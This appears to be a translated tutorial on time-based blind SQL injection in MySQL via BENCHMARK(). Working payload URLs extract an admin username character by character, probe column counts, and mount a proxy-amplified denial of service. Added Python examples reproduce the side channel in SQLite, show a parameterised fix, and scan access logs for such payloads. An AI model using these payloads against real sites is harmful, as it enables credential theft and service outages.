Shangjia technical article
The main idea of this article is to append a function that extends execution time to the constructed statement. If the condition we submit is true, the MySQL query is delayed; if it is false, the time-consuming function is not executed and the query is not delayed. That difference lets us confirm the injection.

BENCHMARK(count, expr)

The BENCHMARK() function executes the expression expr count times. It can be used to time how fast MySQL processes an expression. The result value is always 0. It is intended for use in the mysql client, which reports the query execution time:

    mysql> SELECT BENCHMARK(1000000, ENCODE("hello", "goodbye"));
    +------------------------------------------------+
    | BENCHMARK(1000000, ENCODE("hello", "goodbye")) |
    +------------------------------------------------+
    |                                              0 |
    +------------------------------------------------+
    1 row in set (4.74 sec)

The reported time is elapsed time on the client, not CPU time on the server. It may be wise to execute BENCHMARK() several times and to interpret the result with regard to how heavily loaded the server is.

As long as we set count to a large enough value, the execution time becomes noticeably longer. Let's look at the effect in MySQL:

    mysql> SELECT MD5('test');
    +----------------------------------+
    | MD5('test')                      |
    +----------------------------------+
    | 098f6bcd4621d373cade4e832627b4f6 |
    +----------------------------------+
    1 row in set (0.00 sec)        <----- the execution time is 0.00 sec

    mysql> SELECT BENCHMARK(500000, MD5('test'));
    +--------------------------------+
    | BENCHMARK(500000, MD5('test')) |
    +--------------------------------+
    |                              0 |
    +--------------------------------+
    1 row in set (6.55 sec)        <----- the execution time is 6.55 sec

It can be seen that executing MD5('test') 500000 times with BENCHMARK takes significantly longer than a single execution.

First, let's look at a simple PHP script. The structure and content of the database it queries, injection, are as follows:

    # Database: `injection`

    # Table structure for table `article`
    CREATE TABLE `article` (
      `articleid` int(11) NOT NULL auto_increment,
      `title` varchar(100) NOT NULL default '',
      `content` text NOT NULL,
      PRIMARY KEY (`articleid`)
    ) ENGINE=MyISAM AUTO_INCREMENT=3;

    # Data for table `article`
    INSERT INTO `article` VALUES (1, 'I am a child who does not like reading books', 'laalalalalalalalalal! Yayayayayayay!');
    INSERT INTO `article` VALUES (2, 'I hate you', 'I hate you. What are you?');

    # Table structure for table `user`
    CREATE TABLE `user` (
      `userid` int(11) NOT NULL auto_increment,
      `username` varchar(20) NOT NULL default '',
      `password` varchar(20) NOT NULL default '',
      PRIMARY KEY (`userid`)
    ) ENGINE=MyISAM AUTO_INCREMENT=3;

    # Data for table `user`
    INSERT INTO `user` VALUES (1, 'angel', 'mypass');
    INSERT INTO `user` VALUES (2, '4ngel', 'mypass2');
The script simply checks whether the query returned a result. Assume display_errors=Off has been set. We therefore cannot output sensitive information directly by splicing in a UNION SELECT (this is not to say that UNION cannot be used; the point is that MySQL does not support subqueries), nor can we confirm the injection from differences in error messages. Instead we use a UNION query to embed the BENCHMARK function and confirm the injection by timing:

    id=1 union select 1, benchmark(500000, md5('test')), 1 from user where userid=1 and ord(substring(username,1,1))=97/*

The statement above guesses whether the ASCII value of the first character of the username for userid 1 is 97. If it is 97, the query is delayed by BENCHMARK; if it is not, there is no delay. Repeating this, we can eventually work out the administrator's username and password.

Tip: the single quotes in benchmark(500000, md5('test')) are risky, because the administrator may have configured filtering of quotes, which would make the injection fail. Here test can be written in another representation, such as hexadecimal, which is better suited to the usual injection environment. The final URL is constructed as follows:

    http://127.0.0.1/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97/*

Execution is slow, so the ASCII value of the first character of the username whose userid is 1 is 97.
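The existence check the script performs, and the side channel the payload above relies on, can be reproduced without a MySQL server. The following is an added example, not code from the article: it loads the article's two tables into an in-memory SQLite database, registers a stand-in benchmark() that only counts how often it is evaluated (SQLite has no BENCHMARK(); MySQL's would burn the seconds instead) and a stand-in ord(), and contrasts the vulnerable string-spliced lookup with a hardened one that allowlists the id and binds it as a parameter. substr replaces MySQL's substring, and all function names (article_exists_vulnerable, probe_vulnerable, TimingProbe, and so on) are the example's own.

```python
"""Added example (not from the article): the article's lookup in a
vulnerable and a hardened form, on the article's schema, in SQLite."""
import sqlite3

# The article's `injection` database, trimmed to SQLite syntax.
SCHEMA = """
CREATE TABLE article (articleid INTEGER PRIMARY KEY, title TEXT NOT NULL, content TEXT NOT NULL);
CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL);
INSERT INTO article VALUES (1, 'I am a child who does not like reading books', 'laalalalala!');
INSERT INTO article VALUES (2, 'I hate you', 'I hate you. What are you?');
INSERT INTO user VALUES (1, 'angel', 'mypass');
INSERT INTO user VALUES (2, '4ngel', 'mypass2');
"""


class TimingProbe:
    """Stand-in for MySQL's BENCHMARK(): records how often it was evaluated.
    In MySQL that evaluation is what costs seconds; here we only count it."""

    def __init__(self):
        self.calls = 0

    def benchmark(self, count, expr):
        self.calls += 1
        return 0  # MySQL's BENCHMARK() also always returns 0


def open_db(probe):
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    # Non-deterministic by default, so SQLite evaluates it per matching row,
    # never once up front: exactly the behaviour the timing channel depends on.
    conn.create_function("benchmark", 2, probe.benchmark)
    conn.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
    return conn


def article_exists_vulnerable(conn, article_id):
    # Bad: the request parameter is spliced into the SQL text, so a crafted
    # value appends its own UNION ... FROM user WHERE ... clause.
    sql = "SELECT articleid, title, content FROM article WHERE articleid=" + article_id
    return len(conn.execute(sql).fetchall()) > 0


def article_exists_hardened(conn, article_id):
    # Good: reject anything that is not a plain integer, then bind the value.
    # The user table and the timing function can no longer be reached at all.
    if not article_id.isdigit():
        raise ValueError("article id must be a positive integer")
    sql = "SELECT articleid, title, content FROM article WHERE articleid=?"
    return conn.execute(sql, (int(article_id),)).fetchone() is not None


# Constructed request value shaped like the article's payload
# (SQLite spelling: substr instead of substring, no md5()).
PAYLOAD = ("1 union select 1, benchmark(500000, 1), 1 from user "
           "where userid=1 and ord(substr(username,1,1))={guess}")


def probe_vulnerable(guess):
    """Returns (row_found, benchmark_evaluations) for the spliced query."""
    probe = TimingProbe()
    conn = open_db(probe)
    found = article_exists_vulnerable(conn, PAYLOAD.format(guess=guess))
    return found, probe.calls


def probe_hardened(guess):
    """Returns ('rejected' | 'accepted', benchmark_evaluations) for the bound query."""
    probe = TimingProbe()
    conn = open_db(probe)
    try:
        article_exists_hardened(conn, PAYLOAD.format(guess=guess))
    except ValueError:
        return "rejected", probe.calls
    return "accepted", probe.calls


if __name__ == "__main__":
    print("vulnerable, guess 97:", probe_vulnerable(97))   # (True, 1): the slow path ran
    print("vulnerable, guess 98:", probe_vulnerable(98))   # (True, 0): no delay
    print("hardened,   guess 97:", probe_hardened(97))     # ('rejected', 0)
```

Note that in both vulnerable runs a row is found, so a page that only reports existence looks identical; the only signal is whether the expensive function was evaluated, which is why the article resorts to timing. The hardened handler removes the signal by refusing the value before any SQL is built, and binding the parameter would neutralise the payload even if the allowlist were omitted.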
Tip: when using UNION SELECT we must know the number of columns in the original query. In the past we judged this from the error message: keep appending ",1" to "union select 1" one column at a time, and when the count is right the page returns normally without an error. That method can no longer be used here, so we use BENCHMARK() instead. Construct the statement as:

    union select benchmark(500000, md5(0x41))

and then add one column at a time. When the number of columns is correct, BENCHMARK() is executed and a delay occurs. In this way we can determine the column count.

Beyond the "orthodox" exploitation above, BENCHMARK can also be used for DoS attacks. The idea is very simple: in BENCHMARK(count, expr) we only need a large enough count (number of executions) to cause a DoS. If many such requests are submitted at the same time, through proxies or other means, it becomes a DDoS and the database soon stops responding (the precondition, of course, is that injection is possible). The statement can be constructed as follows:

    http://127.0.0.1/test/show.php?id=1%20union%20select%201,benchmark(99999999,md5(0x41))

This article draws on some foreign material (http://www.ngssoftware.com/papers/HackproofingMySQL.pdf). In fact, using time differences for injection has already been applied to MSSQL, only with a different function (see http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf). For general MySQL + PHP injection (such as the use of UNION), refer to Angel's article "SQL Injection with MySQL".
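Because the timing probe and the DoS variant above both travel in the query string, they leave a usable trace in the web server's access log even when the application itself reports nothing. The following is an added example, not code from the article: it parses constructed access-log lines (shaped like the article's URLs, not real traffic), URL-decodes each query parameter, strips trailing /* comments, and flags values that carry a BENCHMARK() call, a UNION SELECT, or a non-numeric id; the count passed to BENCHMARK is extracted so that a probe-sized call and a DoS-sized one can be told apart. The threshold DOS_COUNT and all function names are the example's own assumptions.

```python
"""Added example (not from the article): flag BENCHMARK()-style injection
attempts in web access logs."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common log format (not from the article); the
# second and third carry request strings shaped like the article's examples.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2004:13:55:36 +0800] "GET /test/show.php?id=2 HTTP/1.1" 200 512
127.0.0.1 - - [10/Oct/2004:13:55:40 +0800] "GET /test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97/* HTTP/1.1" 200 512
127.0.0.1 - - [10/Oct/2004:13:56:02 +0800] "GET /test/show.php?id=1%20union%20select%201,benchmark(99999999,md5(0x41)),1/* HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
BENCHMARK_RE = re.compile(r"\bbenchmark\s*\(\s*(\d+)")
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b")
DOS_COUNT = 10_000_000  # assumption: at or above this, one call is a DoS risk, not a probe


def normalize(value):
    """Lowercase, drop /* ... */ comments (an unterminated trailing one too),
    and squeeze whitespace so the indicator regexes see a stable form."""
    value = re.sub(r"/\*.*?\*/|/\*.*$", " ", value, flags=re.S)
    return " ".join(value.lower().split())


def inspect_param(name, value):
    """Return a finding dict for one decoded query parameter, or None."""
    norm = normalize(value)
    indicators = []
    count = None
    m = BENCHMARK_RE.search(norm)
    if m:
        indicators.append("benchmark")
        count = int(m.group(1))
    if UNION_RE.search(norm):
        indicators.append("union select")
    if name == "id" and not value.strip().isdigit():
        indicators.append("non-numeric id")
    if not indicators:
        return None
    return {
        "param": name,
        "indicators": indicators,
        "benchmark_count": count,
        "dos_sized": count is not None and count >= DOS_COUNT,
    }


def scan_log(text):
    """Scan access-log text; return one finding per suspicious parameter value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes and splits each pair on its first '=' only,
        # so the '=' signs inside an injected WHERE clause stay in the value.
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                finding = inspect_param(name, value)
                if finding:
                    finding["line"] = lineno
                    findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A match on "benchmark" alone is already worth an alert, because there is no legitimate reason for that token to appear in a parameter that is supposed to hold an integer. The count is what distinguishes the two cases the article describes: a value of a few hundred thousand is a blind probe measuring one character, while tens of millions in a single request is an attempt to tie the server up.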